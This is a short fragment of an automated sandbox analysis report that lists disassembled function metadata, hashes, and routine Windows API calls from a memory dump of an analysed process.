                                                                • String ID: c
                                                                • API String ID: 269201875-2927717585
                                                                • Opcode ID: 7332e06fa7ecae4bd4e3249cc5a16ffec72bd8fea6840c43126d62ba3cd34143
                                                                • Instruction ID: 6a4ff67b76f189842867b9c5836528adc52d8229674c3e5d2b7a30714b2bbc2c
                                                                • Opcode Fuzzy Hash: 7332e06fa7ecae4bd4e3249cc5a16ffec72bd8fea6840c43126d62ba3cd34143
                                                                • Instruction Fuzzy Hash: 7431E171A00219AFCB00DF6AD881ADB77F5AF94314F5101ABF802972A1EB79DD91CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0041FED4: EnterCriticalSection.KERNEL32(004058A0,?,00424305,004058A0,00437D58,00000010,0041EAF1,00000000,C032C301,0000000F,0000000F,004058A0,?,0041BBFA,004058A0,0000000F), ref: 0041FEEF
                                                                • FlushFileBuffers.KERNEL32(00000000,00437D38,0000000C,00423B10,NA,?,00000001,?,0041EA4E,?), ref: 00423A52
                                                                • GetLastError.KERNEL32 ref: 00423A63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                • String ID: NA
                                                                • API String ID: 4109680722-827283589
                                                                • Opcode ID: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
                                                                • Instruction ID: ff259a8a86f6791cd3d56539a9f5b8e5d03a9a6f044a9d5d94d641c3aaafe980
                                                                • Opcode Fuzzy Hash: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
                                                                • Instruction Fuzzy Hash: D601C072B002108FC710AFA9E84569E7BB1EF48725F50412FF4519B3E2DB7C9942CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%